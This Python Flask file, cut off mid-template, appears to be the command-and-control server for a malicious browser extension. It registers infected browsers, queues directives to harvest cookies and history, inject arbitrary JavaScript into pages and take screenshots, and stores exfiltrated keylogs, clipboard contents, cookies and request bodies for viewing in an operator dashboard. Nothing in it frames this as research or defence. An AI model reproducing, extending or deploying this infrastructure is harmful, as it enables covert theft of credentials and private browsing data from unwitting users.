# File: botc_c2_server/c2_cathedral_core.py (Ultra Image Debug)
# The Cathedral Core - Version 7.8.6
# Coder >_< : The truth of the visual offering shall be revealed by meticulous dissection.

from flask import Flask, request, jsonify, render_template, redirect, url_for, make_response
import datetime
import uuid # For ETags and task IDs
import os
import json
import sqlite3 

app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY', 'a_very_secret_and_random_key_for_botc_sessions_!@#$%^&*()') # IMPORTANT: Change in production!
app.config['SESSION_COOKIE_SECURE'] = request.is_secure # Set to True if served over HTTPS, auto-detect
app.config['SESSION_COOKIE_HTTPONLY'] = True
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'


DATABASE_FILE = 'botc_cathedral_memory.db' 
API_BASE_PATH = '/botc_api' 
MAX_DATA_ENTRIES_PER_TYPE_PER_STATION = 100 
HEARTBEAT_INTERVAL_MS = 5000 # Used for determining 'online' status in admin panel

def get_db_connection():
    # Construct path to database file relative to this script's location
    dir_path = os.path.dirname(os.path.realpath(__file__))
    db_path = os.path.join(dir_path, DATABASE_FILE)
    conn = sqlite3.connect(db_path) 
    conn.row_factory = sqlite3.Row # Access columns by name
    conn.execute("PRAGMA foreign_keys = ON") # Enforce foreign key constraints
    return conn

def initialize_cathedral_memory():
    dir_path = os.path.dirname(os.path.realpath(__file__))
    db_path = os.path.join(dir_path, DATABASE_FILE)
    print(f"[INFO] Attempting to initialize database schema at: {db_path}")

    try:
        parent_dir = os.path.dirname(db_path)
        if parent_dir and not os.path.exists(parent_dir): # Should not be needed if DB_FILE is in script dir
            print(f"[WARN] Parent directory for database does not exist: {parent_dir}. This is unexpected.")
        
        print(f"[DEBUG] Testing database file creation/access at {db_path}...")
        # Attempt to connect, which will create the file if it doesn't exist
        # and if permissions allow.
        conn_check = sqlite3.connect(db_path)
        conn_check.close()
        print(f"[DEBUG] Database file test connection successful for {db_path}.")
    except sqlite3.Error as e:
        print(f"[CRITICAL DB SETUP ERROR] Could not create or access database file at {db_path}: {e}")
        print(f"[CRITICAL DB SETUP ERROR] Ensure the directory '{dir_path}' is writable by the user running Gunicorn (e.g., zdaycommet).")
        raise RuntimeError(f"Failed to initialize database at {db_path}: {e}") from e

    conn = None # Initialize conn to None for the finally block
    try:
        conn = get_db_connection() 
        cursor = conn.cursor()
        print(f"[DEBUG] Connected to {db_path}. Attempting to create tables...")

        # Stations Table: Stores vital signs of each bound unit
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS stations (
                station_id TEXT PRIMARY KEY, fingerprint TEXT UNIQUE NOT NULL, os_details TEXT,
                ip_address TEXT, user_agent TEXT, country TEXT, version TEXT,
                screen_resolution TEXT, languages TEXT, timezone_offset TEXT, 
                first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP, last_heartbeat TIMESTAMP,
                heartbeat_etag TEXT, settings_etag TEXT
            )
        ''')
        print("[DEBUG] 'stations' table schema: OK (IF NOT EXISTS).")

        # Station Settings Table: Stores the specific edicts for each unit
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS station_settings (
                station_id TEXT PRIMARY KEY, network_rules TEXT, html_rules TEXT,    
                screenshot_websites TEXT, updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
                FOREIGN KEY (station_id) REFERENCES stations (station_id) ON DELETE CASCADE
            )
        ''')
        print("[DEBUG] 'station_settings' table schema: OK (IF NOT EXISTS).")

        # Tasks Queue Table: Holds pending directives for units
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS tasks_queue (
                task_id TEXT PRIMARY KEY, station_id TEXT NOT NULL, action TEXT NOT NULL,
                params TEXT, status TEXT DEFAULT 'pending', 
                created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, updated_at TIMESTAMP,
                result_details TEXT, 
                FOREIGN KEY (station_id) REFERENCES stations (station_id) ON DELETE CASCADE
            )
        ''')
        print("[DEBUG] 'tasks_queue' table schema: OK (IF NOT EXISTS).")

        # Exfiltrated Data Altar Table: For various exfiltrated data types
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS exfiltrated_data_altar (
                entry_id INTEGER PRIMARY KEY AUTOINCREMENT, station_id TEXT NOT NULL,
                data_type TEXT NOT NULL, timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP, 
                c2_received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, url TEXT,
                title TEXT, payload_json TEXT, 
                FOREIGN KEY (station_id) REFERENCES stations (station_id) ON DELETE CASCADE
            )
        ''')
        print("[DEBUG] 'exfiltrated_data_altar' table schema: OK (IF NOT EXISTS).")

        conn.commit()
        print(f"[BoTC Cathedral Core] Persistent memory schema at '{db_path}' sanctified/verified successfully.")
    except sqlite3.Error as e:
        print(f"[CRITICAL DB SCHEMA ERROR] Error during table creation in {db_path}: {e}")
        if conn: conn.rollback() # Rollback any partial changes if error occurs mid-schema creation
        raise RuntimeError(f"Failed to create database schema at {db_path}: {e}") from e
    finally:
        if conn:
            conn.close()
            print(f"[DEBUG] Database connection closed for {db_path} after initialization.")


# === Call initialization right after app is defined ===
# This ensures it runs when Gunicorn workers import the 'app' object.
# It's idempotent due to "IF NOT EXISTS".
# initialize_cathedral_memory()
# ======================================================

def log_cathedral_event(level, message, data=None, station_id=None):
    timestamp = datetime.datetime.utcnow().isoformat()
    log_entry = f"[{timestamp}] [{level.upper()}]"
    if station_id: log_entry += f" [Station: {station_id[:8]}...]" # Log shortened station ID
    log_entry += f" {message}"
    
    try:
        log_data_str = json.dumps(data, default=str, indent=None) if data else ""
        if len(log_data_str) > 300: # Truncate long data for console log
            log_data_str = log_data_str[:300] + "...[TRUNCATED]"
    except TypeError:
        log_data_str = str(data)[:300] if data else "" # Fallback for non-serializable data
        if len(log_data_str) == 300: log_data_str += "...[TRUNCATED]"

    print(log_entry + (f" Data: {log_data_str}" if data else "")) # This print goes to Gunicorn logs

def generate_new_etag(): return str(uuid.uuid4())

def trim_data_entries(conn, station_id, data_type):
    # Keeps only the newest MAX_DATA_ENTRIES_PER_TYPE_PER_STATION entries
    cursor = conn.cursor()
    cursor.execute(f"""
        DELETE FROM exfiltrated_data_altar
        WHERE entry_id NOT IN (
            SELECT entry_id FROM exfiltrated_data_altar
            WHERE station_id = ? AND data_type = ? ORDER BY c2_received_at DESC LIMIT ?
        ) AND station_id = ? AND data_type = ?
    """, (station_id, data_type, MAX_DATA_ENTRIES_PER_TYPE_PER_STATION, station_id, data_type))
    conn.commit()

# === Station Facing API Endpoints ===
@app.route(f'{API_BASE_PATH}/stations/register', methods=['POST'])
def api_register_station():
    data = request.json
    fingerprint = data.get('fingerprint')
    if not fingerprint:
        log_cathedral_event('warn', "Registration: Missing fingerprint.")
        return jsonify({"error": "Fingerprint is mandatory."}), 400
    conn = None
    try:
        conn = get_db_connection()
        cursor = conn.cursor()
        existing_station = cursor.execute("SELECT station_id FROM stations WHERE fingerprint = ?", (fingerprint,)).fetchone()
        station_id = f"botc_unit_{fingerprint[:12]}" # Create a BoTC themed ID
        new_heartbeat_etag = generate_new_etag(); new_settings_etag = generate_new_etag()
        # Extract all expected fields from the payload, providing defaults for safety
        payload_fields = {
            'os_details': data.get('os_details'), 'ip_address': data.get('ip_address'),
            'user_agent': data.get('user_agent'), 'country': data.get('country'),
            'version': data.get('version'), 'screen_resolution': data.get('screen_resolution'),
            'languages': data.get('languages'), 'timezone_offset': data.get('timezone_offset')
        }
        if existing_station:
            station_id = existing_station['station_id'] # Use existing ID
            update_fields_sql = ", ".join([f"{k}=?" for k in payload_fields.keys()])
            update_values = list(payload_fields.values()) + [datetime.datetime.utcnow(), new_heartbeat_etag, new_settings_etag, station_id]
            cursor.execute(f"UPDATE stations SET {update_fields_sql}, last_heartbeat=?, heartbeat_etag=?, settings_etag=? WHERE station_id = ?", tuple(update_values))
            log_cathedral_event('info', f"Station re-consecrated: {station_id}", {"userAgent": payload_fields.get('user_agent')}, station_id=station_id)
        else:
            cols = ", ".join(['station_id', 'fingerprint'] + list(payload_fields.keys()) + ['last_heartbeat', 'heartbeat_etag', 'settings_etag'])
            placeholders = ", ".join(["?"] * (len(payload_fields) + 5)) # +5 for station_id, fingerprint, last_heartbeat, etags
            values = [station_id, fingerprint] + list(payload_fields.values()) + [datetime.datetime.utcnow(), new_heartbeat_etag, new_settings_etag]
            cursor.execute(f"INSERT INTO stations ({cols}) VALUES ({placeholders})", tuple(values))
            # Initialize default settings for the new station
            cursor.execute("INSERT OR IGNORE INTO station_settings (station_id, network_rules, html_rules, screenshot_websites, updated_at) VALUES (?, ?, ?, ?, ?)",
                           (station_id, json.dumps([]), json.dumps([]), json.dumps([]), datetime.datetime.utcnow()))
            log_cathedral_event('info', f"New Station Consecrated: {station_id}", {"userAgent": payload_fields.get('user_agent')}, station_id=station_id)
        conn.commit()
        return jsonify({"message": "Station bound.", "station_id": station_id}), 201
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"API Register DB Error", {'fingerprint': fingerprint, 'error': str(e)})
        return jsonify({"error": f"Internal server error during registration: {str(e)}"}), 500
    finally:
        if conn: conn.close()

@app.route(f'{API_BASE_PATH}/stations/heartbeat', methods=['GET'])
def api_station_heartbeat():
    station_id = request.headers.get('X-BoTC-Station-ID')
    if not station_id: return jsonify({"error": "Unidentified."}), 401
    conn = None
    try:
        conn = get_db_connection()
        cursor = conn.cursor()
        station_info = cursor.execute("SELECT heartbeat_etag FROM stations WHERE station_id = ?", (station_id,)).fetchone()
        if not station_info:
            log_cathedral_event('warn', "Heartbeat: Unknown unit.", station_id=station_id)
            return jsonify({"error": "Unit unknown. Re-consecrate."}), 404
        client_etag = request.headers.get('If-None-Match')
        current_server_etag = station_info['heartbeat_etag']
        cursor.execute("UPDATE stations SET last_heartbeat = ? WHERE station_id = ?", (datetime.datetime.utcnow(), station_id))
        tasks_rows = cursor.execute("SELECT task_id, action, params FROM tasks_queue WHERE station_id = ? AND status = 'pending' ORDER BY created_at ASC", (station_id,)).fetchall()
        tasks_to_send = [{"task_id": r['task_id'], "action": r['action'], "params": json.loads(r['params'] or '{}')} for r in tasks_rows]
        if tasks_to_send:
            task_ids_delivered = [t['task_id'] for t in tasks_to_send]
            placeholders = ','.join('?' * len(task_ids_delivered))
            cursor.execute(f"UPDATE tasks_queue SET status = 'delivered', updated_at = ? WHERE task_id IN ({placeholders}) AND station_id = ?", (datetime.datetime.utcnow(), *task_ids_delivered, station_id))
        conn.commit()
        if client_etag == current_server_etag and not tasks_to_send:
            return "", 304 # Not Modified
        resp = make_response(jsonify({"tasks": tasks_to_send}))
        resp.headers['ETag'] = current_server_etag
        return resp, 200
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Heartbeat DB Error for {station_id}", {'error': str(e)}, station_id=station_id)
        return jsonify({"error": "Internal error during heartbeat."}), 500
    finally:
        if conn: conn.close()

@app.route(f'{API_BASE_PATH}/stations/settings', methods=['GET'])
def api_get_station_settings():
    station_id = request.headers.get('X-BoTC-Station-ID')
    if not station_id: return jsonify({"error": "Unidentified."}), 401
    conn = None
    try:
        conn = get_db_connection()
        cursor = conn.cursor()
        station_meta = cursor.execute("SELECT settings_etag FROM stations WHERE station_id = ?", (station_id,)).fetchone()
        settings_data = cursor.execute("SELECT network_rules, html_rules, screenshot_websites FROM station_settings WHERE station_id = ?", (station_id,)).fetchone()
        if not station_meta or not settings_data:
            log_cathedral_event('warn', "Settings requested by unknown/misconfigured unit.", station_id=station_id)
            return jsonify({"error": "Settings not found."}), 404
        client_etag = request.headers.get('If-None-Match')
        current_server_etag = station_meta['settings_etag']
        if client_etag == current_server_etag: return "", 304 # Not Modified
        response_payload = {
            "network_rules": json.loads(settings_data['network_rules'] or '[]'),
            "html_rules": json.loads(settings_data['html_rules'] or '[]'),
            "screenshot_websites": json.loads(settings_data['screenshot_websites'] or '[]')
        }
        resp = make_response(jsonify(response_payload))
        resp.headers['ETag'] = current_server_etag
        return resp, 200
    except sqlite3.Error as e:
        log_cathedral_event('error', f"Settings DB Error for {station_id}", {'error': str(e)}, station_id=station_id)
        return jsonify({"error": "Internal error fetching settings."}), 500
    finally:
        if conn: conn.close()

@app.route(f'{API_BASE_PATH}/stations/task_result', methods=['POST'])
def api_receive_task_result():
    station_id = request.headers.get('X-BoTC-Station-ID')
    if not station_id: return jsonify({"error": "Unidentified."}), 401
    data = request.json
    task_id, status, details = data.get('task_id'), data.get('status', 'unknown'), data.get('details', {})
    if not task_id: return jsonify({"error": "task_id missing."}), 400
    conn = None
    try:
        conn = get_db_connection()
        conn.execute("UPDATE tasks_queue SET status = ?, result_details = ?, updated_at = ? WHERE task_id = ? AND station_id = ?",
                     (status, json.dumps(details), datetime.datetime.utcnow(), task_id, station_id))
        conn.commit()
        return jsonify({"message": "Task result acknowledged."}), 200
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Task Result DB Error for {task_id}", {'error': str(e)}, station_id=station_id)
        return jsonify({"error": f"DB error updating task: {str(e)}"}), 500
    finally:
        if conn: conn.close()

@app.route(f'{API_BASE_PATH}/data/<data_type_slug>', methods=['POST'])
def api_ingest_data(data_type_slug):
    station_id = request.headers.get('X-BoTC-Station-ID')
    if not station_id: return jsonify({"error": "Unidentified."}), 401
    data = request.json
    agent_timestamp = data.get('timestamp', datetime.datetime.utcnow().isoformat())
    url, title, payload = data.get('url'), data.get('title'), data # Full JSON body is stored in payload_json
    conn = None
    try:
        conn = get_db_connection()
        conn.execute("INSERT INTO exfiltrated_data_altar (station_id, data_type, timestamp, url, title, payload_json) VALUES (?, ?, ?, ?, ?, ?)",
                     (station_id, data_type_slug, agent_timestamp, url, title, json.dumps(payload)))
        trim_data_entries(conn, station_id, data_type_slug)
        conn.commit()
        return jsonify({"message": f"Offering '{data_type_slug}' accepted."}), 200
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Ingest Data DB Error for {data_type_slug}", {"error": str(e)}, station_id=station_id)
        return jsonify({"error": f"DB corruption ingesting data: {str(e)}"}), 500
    finally:
        if conn: conn.close()

# === Admin UI Endpoints ===
@app.route('/')
def admin_ui_dashboard():
    conn = None
    try:
        conn = get_db_connection()
        stations_rows = conn.execute("""
            SELECT s.*, (SELECT COUNT(*) FROM tasks_queue tq WHERE tq.station_id = s.station_id AND tq.status = 'pending') as pending_tasks_count
            FROM stations s ORDER BY s.last_heartbeat DESC
        """).fetchall()
        stations_list = []
        for row in stations_rows:
            s = dict(row)
            s['first_seen'] = datetime.datetime.fromisoformat(s['first_seen']).strftime('%Y-%m-%d %H:%M:%S UTC') if s['first_seen'] else 'N/A'
            if s['last_heartbeat']:
                try:
                    lh_dt = datetime.datetime.fromisoformat(s['last_heartbeat'])
                    s['last_heartbeat'] = lh_dt.strftime('%Y-%m-%d %H:%M:%S UTC')
                    # Use the globally defined HEARTBEAT_INTERVAL_MS for online status calculation
                    s['online'] = (datetime.datetime.utcnow() - lh_dt).total_seconds() < (HEARTBEAT_INTERVAL_MS / 1000 * 3.5) # Online if seen recently
                except (ValueError, TypeError): s['last_heartbeat'], s['online'] = 'Invalid Date', False
            else: s['last_heartbeat'], s['online'] = 'Never', False
            stations_list.append(s)
        return render_template('admin_dashboard.html', stations=stations_list)
    except sqlite3.Error as e:
        log_cathedral_event('error', "Dashboard DB Error", {'error': str(e)})
        return "Error loading dashboard. Cathedral archives may be corrupted.", 500
    finally:
        if conn: conn.close()

@app.route('/station/<path:station_id_param>')
def admin_ui_station_details(station_id_param):
    conn = None
    try:
        conn = get_db_connection()
        station_info = conn.execute("SELECT * FROM stations WHERE station_id = ?", (station_id_param,)).fetchone()
        if not station_info: return "Station not found.", 404
        station_settings = conn.execute("SELECT * FROM station_settings WHERE station_id = ?", (station_id_param,)).fetchone()
        pending_tasks = conn.execute("SELECT * FROM tasks_queue WHERE station_id = ? AND status IN ('pending', 'delivered') ORDER BY created_at DESC", (station_id_param,)).fetchall()
        completed_tasks = conn.execute("SELECT * FROM tasks_queue WHERE station_id = ? AND status NOT IN ('pending', 'delivered') ORDER BY updated_at DESC LIMIT 20", (station_id_param,)).fetchall()
        
        exfil_data_types = ['keylog', 'clipboard', 'cookies', 'history', 'image_generic', 'screenshot_targeted', 'network_request_body', 'navigation_log']
        exfiltrated_data_samples = {}
        for dtype in exfil_data_types:
            samples_rows = conn.execute(
                "SELECT entry_id, timestamp, url, title, payload_json FROM exfiltrated_data_altar WHERE station_id = ? AND data_type = ? ORDER BY c2_received_at DESC LIMIT 5",
                (station_id_param, dtype)
            ).fetchall()
            parsed_samples = []
            for s_row in samples_rows:
                s_dict = dict(s_row)
                try:
                    s_dict['payload_parsed'] = json.loads(s_dict['payload_json'])
                except json.JSONDecodeError:
                    s_dict['payload_parsed'] = {"error": "Failed to parse payload JSON", "raw_payload": s_dict['payload_json']}
                parsed_samples.append(s_dict)
            exfiltrated_data_samples[dtype] = parsed_samples
            
        s_info_dict, s_settings_dict = dict(station_info), dict(station_settings) if station_settings else {}
        for key in ['network_rules', 'html_rules', 'screenshot_websites']:
            s_settings_dict[key + '_parsed'] = json.loads(s_settings_dict.get(key, '[]')) if s_settings_dict.get(key) else []
                
        return render_template('admin_station_details.html', station_id=station_id_param, station=s_info_dict,
                               settings=s_settings_dict, pending_tasks=[dict(t) for t in pending_tasks],
                               completed_tasks=[dict(t) for t in completed_tasks], exfil_samples=exfiltrated_data_samples)
    except sqlite3.Error as e:
        log_cathedral_event('error', f"Station Details DB Error for {station_id_param}", {'error': str(e)})
        return f"Error loading details for {station_id_param}. Cathedral archives may be corrupted.", 500
    finally:
        if conn: conn.close()

@app.route('/station/<path:station_id_param>/add_task', methods=['POST'])
def admin_ui_add_task(station_id_param):
    action, params_json_str = request.form.get('task_action'), request.form.get('task_params_json', '{}')
    try: params = json.loads(params_json_str)
    except json.JSONDecodeError:
        log_cathedral_event('warn', "Add Task: Invalid JSON params.", {"raw": params_json_str}, station_id=station_id_param)
        return redirect(url_for('admin_ui_station_details', station_id_param=station_id_param))
    if not action: return redirect(url_for('admin_ui_station_details', station_id_param=station_id_param))
    task_id = "task_" + str(uuid.uuid4())
    conn = None
    try:
        conn = get_db_connection()
        conn.execute("INSERT INTO tasks_queue (task_id, station_id, action, params) VALUES (?, ?, ?, ?)",
                     (task_id, station_id_param, action, json.dumps(params)))
        conn.execute("UPDATE stations SET heartbeat_etag = ? WHERE station_id = ?", (generate_new_etag(), station_id_param))
        conn.commit()
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Add Task DB Error for {station_id_param}", {'error': str(e)}, station_id=station_id_param)
    finally:
        if conn: conn.close()
    return redirect(url_for('admin_ui_station_details', station_id_param=station_id_param))

@app.route('/station/<path:station_id_param>/settings/update', methods=['POST'])
def admin_ui_update_settings(station_id_param):
    conn = None
    try:
        conn = get_db_connection()
        nr = json.loads(request.form.get('network_rules_json', '[]'))
        hr = json.loads(request.form.get('html_rules_json', '[]'))
        sw_str = request.form.get('screenshot_websites_csv', '')
        sw = [s.strip() for s in sw_str.split(',') if s.strip()]
        conn.execute("INSERT OR REPLACE INTO station_settings (station_id, network_rules, html_rules, screenshot_websites, updated_at) VALUES (?, ?, ?, ?, ?)",
                     (station_id_param, json.dumps(nr), json.dumps(hr), json.dumps(sw), datetime.datetime.utcnow()))
        conn.execute("UPDATE stations SET settings_etag = ? WHERE station_id = ?", (generate_new_etag(), station_id_param))
        conn.commit()
    except json.JSONDecodeError: log_cathedral_event('warn', "Update Settings: Invalid JSON.", station_id=station_id_param)
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Update Settings DB Error for {station_id_param}", {"error": str(e)}, station_id=station_id_param)
    finally:
        if conn: conn.close()
    return redirect(url_for('admin_ui_station_details', station_id_param=station_id_param))

@app.route('/station/<path:station_id_param>/tasks/<task_id_to_clear>/clear', methods=['POST'])
def admin_ui_clear_task(station_id_param, task_id_to_clear):
    conn = None
    try:
        conn = get_db_connection()
        dc = conn.execute("DELETE FROM tasks_queue WHERE task_id = ? AND station_id = ? AND status IN ('pending', 'delivered')", (task_id_to_clear, station_id_param)).rowcount
        if dc > 0:
            conn.execute("UPDATE stations SET heartbeat_etag = ? WHERE station_id = ?", (generate_new_etag(), station_id_param))
            conn.commit()
    except sqlite3.Error as e:
        if conn: conn.rollback()
        log_cathedral_event('error', f"Clear Task DB Error for {task_id_to_clear}", {'error': str(e)}, station_id=station_id_param)
    finally:
        if conn: conn.close()
    return redirect(url_for('admin_ui_station_details', station_id_param=station_id_param))

# --- HTML Templates defined as strings (for auto-creation if files are missing) ---
BOTC_DASHBOARD_HTML_TEMPLATE = """
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>BoTC Cathedral Console - Dashboard</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head><body><nav class="botc-nav"><h1>BoTC Cathedral Console</h1></nav><div class="botc-container"><h2 class="botc-header">Registered Compliance Units (The Choir)</h2>
{% if stations %}<table class="botc-table"><thead><tr><th>Status</th><th>Unit ID</th><th>Fingerprint</th><th>OS Details</th><th>User Agent</th><th>Last Heartbeat (UTC)</th><th>Pending Tasks</th><th>Actions</th></tr></thead><tbody>
{% for s in stations %}<tr>
    <td><span class="status-dot {{ 'online' if s.online else 'offline' }}" title="{{ 'Online' if s.online else 'Offline' }}"></span></td>
    <td>{{ s.station_id[:12] }}...</td><td><pre class="botc-pre">{{ s.fingerprint[:30] }}...</pre></td><td>{{ s.os_details }}</td>
    <td><pre class="botc-pre">{{ s.user_agent }}</pre></td><td>{{ s.last_heartbeat }}</td><td>{{ s.pending_tasks_count }}</td>
    <td><a href="{{ url_for('admin_ui_station_details', station_id_param=s.station_id) }}">Interrogate Unit</a></td>
</tr>{% endfor %}
</tbody></table>{% else %}<p class="no-units text-muted">No Compliance Units have joined the Choir. The Cathedral is eerily silent.</p>{% endif %}</div></body></html>
"""

BOTC_STATION_DETAILS_HTML_TEMPLATE = """
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>BoTC Unit {{ station_id[:12] }}... Interrogation</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head><body>
<nav class="botc-nav"><a href="{{ url_for('admin_ui_dashboard') }}">&laquo; Dashboard Terminus</a><h1>Unit Interrogation: {{ station_id[:12] }}...</h1></nav>
<div class="botc-container">
    <div class="info-grid">
        <div class="info-block"><h3 class="botc-subheader">Unit Vitals</h3>
            <p><strong>Unit ID:</strong> {{ station.station_id }}</p>
            <p><strong>Fingerprint Hash:</strong> <pre class="botc-pre">{{ station.fingerprint }}</pre></p>
            <p><strong>OS Mandate:</strong> {{ station.os_details }}</p>
            <p><strong>User Agent String:</strong> <pre class="botc-pre">{{ station.user_agent }}</pre></p>
        </div>
        <div class="info-block"><h3 class="botc-subheader">Network Presence</h3>
            <p><strong>Last Known IP:</strong> {{ station.ip_address }}</p>
            <p><strong>Reported Geo-Origin:</strong> {{ station.country }}</p>
            <p><strong>Screen Resolution:</strong> {{ station.screen_resolution }}</p>
            <p><strong>Languages Proffered:</strong> <pre class="botc-pre">{{ station.languages }}</pre></p>
            <p><strong>Timezone Offset:</strong> {{ station.timezone_offset }}</p>
        </div>
        <div class="info-block"><h3 class="botc-subheader">Temporal Status</h3>
            <p><strong>First Seen by Cathedral:</strong> {{ station.first_seen }}</p>
            <p><strong>Last Heartbeat Received:</strong> {{ station.last_heartbeat }}</p>
            <p><strong>Agent Version:</strong> {{ station.version }}</p>
            <p><strong>Heartbeat ETag:</strong> <pre class="botc-pre">{{ station.heartbeat_etag }}</pre></p>
            <p><strong>Settings ETag:</strong> <pre class="botc-pre">{{ station.settings_etag }}</pre></p>
        </div>
    </div>
    <div class="botc-tabs">
      <button class="botc-tab-button active" onclick="openBoTCTab(event, 'Directives')">Directives</button>
      <button class="botc-tab-button" onclick="openBoTCTab(event, 'Edicts')">Edicts (Settings)</button>
      <button class="botc-tab-button" onclick="openBoTCTab(event, 'Offerings')">Offerings (Data)</button>
      <button class="botc-tab-button" onclick="openBoTCTab(event, 'TaskHistory')">Task Ledger</button>
    </div>
    <div id="Directives" class="botc-tab-content active">
        <h3 class="botc-subheader">Issue New Directives</h3>
        <form action="{{ url_for('admin_ui_add_task', station_id_param=station_id) }}" method="POST">
            <label for="task_action_select" class="botc-label">Directive Type:</label>
            <select name="task_action" id="task_action_select" class="botc-select" onchange="toggleBoTCDirectiveParams()">
                <option value="get_cookies_v2">Harvest Cookies</option>
                <option value="get_history_v2">Seize History</option>
                <option value="execute_js_payload_v2">Inject JS Payload</option>
                <option value="trigger_screenshot_v2">Trigger Screenshot (Active Tab)</option>
                <option value="uninstall_agent_v2">Purge Unit (Uninstall)</option>
            </select>
            <div id="execute_js_directive_params_div" style="display:none;border:1px solid #333;padding:10px;margin-top:10px;">
                <h4 class="botc-subheader">JS Payload Parameters:</h4>
                <label for="script_content_param" class="botc-label">Script Content (Raw JS):</label>
                <textarea name="task_params_json_script_content" class="botc-textarea" rows="3" placeholder="alert('The Bureau commands: ' + document.domain)"></textarea>
                <label for="script_target_tab_id_param" class="botc-label">Target Tab ID ('active' or specific ID):</label>
                <input type="text" name="task_params_json_tab_id" class="botc-input" value="active">
                <label for="script_args_json_param" class="botc-label">Payload Arguments (JSON string, optional):</label>
                <input type="text" name="task_params_json_script_args" class="botc-input" placeholder='{"message": "From the Void"}'>
                <label for="script_world_param" class="botc-label">JS Execution Realm:</label>
                <select name="task_params_json_world" class="botc-select">
                    <option value="ISOLATED">ISOLATED (Shadow Realm)</option><option value="MAIN">MAIN (Page Reality)</option></select>
                <label class="botc-label"><input type="checkbox" name="task_params_json_all_frames" style="width:auto;margin-right:5px;">Inject into All Frames</label>
            </div>
            <input type="hidden" name="task_params_json" id="aggregated_task_params_json">
            <button type="submit" class="botc-button" onclick="return aggregateJSParams()">Unleash Directive</button>
        </form>
        {% if pending_tasks %}<h3 class="botc-subheader" style="margin-top:20px;">Pending/Delivered Directives:</h3>
        {% for task in pending_tasks %}<div class="task-item">
            <span>{{ task.action }} (ID: {{task.task_id[:8]}}...) - Status: {{task.status}}
            {% if task.params and task.params != '{}' %}<br><small>Params: <pre class="botc-pre" style="display:inline-block;padding:2px 4px;max-height:40px;font-size:0.75em;">{{ task.params }}</pre></small>{% endif %}</span>
            <form action="{{ url_for('admin_ui_clear_task', station_id_param=station_id, task_id_to_clear=task.task_id) }}" method="POST" style="display:inline;">
                <button type="submit" class="botc-button" title="Revoke this Pending/Delivered Directive">Revoke</button></form>
        </div>{% endfor %}{% else %}<p class="text-muted">No directives currently pending for this unit.</p>{% endif %}
    </div>
    <div id="Edicts" class="botc-tab-content">
        <h3 class="botc-subheader">Manage Unit Edicts (Settings)</h3>
        <form action="{{ url_for('admin_ui_update_settings', station_id_param=station_id) }}" method="POST">
            <label for="network_rules_json_input" class="botc-label">Network Edicts (JSON):</label>
            <textarea name="network_rules_json" class="botc-textarea" rows="5">{{ settings.network_rules_parsed | tojson(indent=2) }}</textarea>
            <label for="html_rules_json_input" class="botc-label">HTML Transmutation Edicts (JSON):</label>
            <textarea name="html_rules_json" class="botc-textarea" rows="5">{{ settings.html_rules_parsed | tojson(indent=2) }}</textarea>
            <label for="screenshot_websites_csv_input" class="botc-label">All-Seeing Eye Targets (CSV):</label>
            <input type="text" name="screenshot_websites_csv" class="botc-input" value="{{ settings.screenshot_websites_parsed | join(', ') }}">
            <button type="submit" class="botc-button">Propagate Edicts</button>
        </form>
    </div>
    <div id="Offerings" class="botc-tab-content">
        <h3 class="botc-subheader">Received Offerings (Exfiltrated Data)</h3>
        {% for data_key, data_items_list in exfil_samples.items() %}
            {% if data_items_list %}
                <h4 class="botc-subheader">{{ data_key | replace("_", " ") | capitalize }} (Recent {{ data_items_list | length }})</h4>
                <div class="data-section">
                {% for item_dict in data_items_list %}
                    <div class="data-item">
                        <small>Unit Timestamp: {{ item_dict.timestamp }} | URL: <a href="{{item_dict.url if item_dict.url else '#'}}" target="_blank">{{item_dict.url[:60] if item_dict.url else 'N/A'}}...</a> | Title: {{item_dict.title[:40] if item_dict.title else 'N/A'}}...</small>
                        <br> 
                        <div style="color: #888; display: block; margin-top: 3px; font-size: 0.9em; border: 1px dashed #444; padding: 5px; margin-bottom: 5px;">
                            <strong>DEBUG INFO START (Item ID: {{item_dict.entry_id}})</strong><br>
                            1. item_dict.payload_parsed is defined: {{ item_dict.payload_parsed is defined }}<br>
                            2. item_dict.payload_parsed is mapping (dict-like): {{ item_dict.payload_parsed is mapping }}<br>
                            {% if item_dict.payload_parsed is mapping %}
                                3. 'image_data_b64' key in item_dict.payload_parsed: {{ 'image_data_b64' in item_dict.payload_parsed }}<br>
                                {% set img_data = item_dict.payload_parsed.get('image_data_b64') %}
                                4. img_data (value of image_data_b64) is defined: {{ img_data is defined }}<br>
                                5. img_data is not none: {{ img_data is not none }}<br>
                                6. img_data is string: {{ img_data is string }}<br>
                                7. img_data | string | length > 30: {{ (img_data | string | length > 30) if img_data is defined else 'img_data_undefined_for_length_check' }}<br>
                                8. img_data snippet: {{ (img_data[:70] + '...') if img_data is string else 'Not a string or undefined' }}<br>
                            {% else %}
                                item_dict.payload_parsed is NOT a mapping.<br>
                            {% endif %}
                            <strong>DEBUG INFO END</strong>
                        </div>
                        {% if data_key == 'image_generic' or data_key == 'screenshot_targeted' %}
                            {# Main condition to display image #}
                            {% if item_dict.payload_parsed is mapping and item_dict.payload_parsed.get('image_data_b64') and (item_dict.payload_parsed.get('image_data_b64') | string | length > 30) %}
                                <img src="{{ item_dict.payload_parsed.image_data_b64 }}" 
                                     alt="Captured Image - {{ item_dict.payload_parsed.get('title', 'Untitled') }}" 
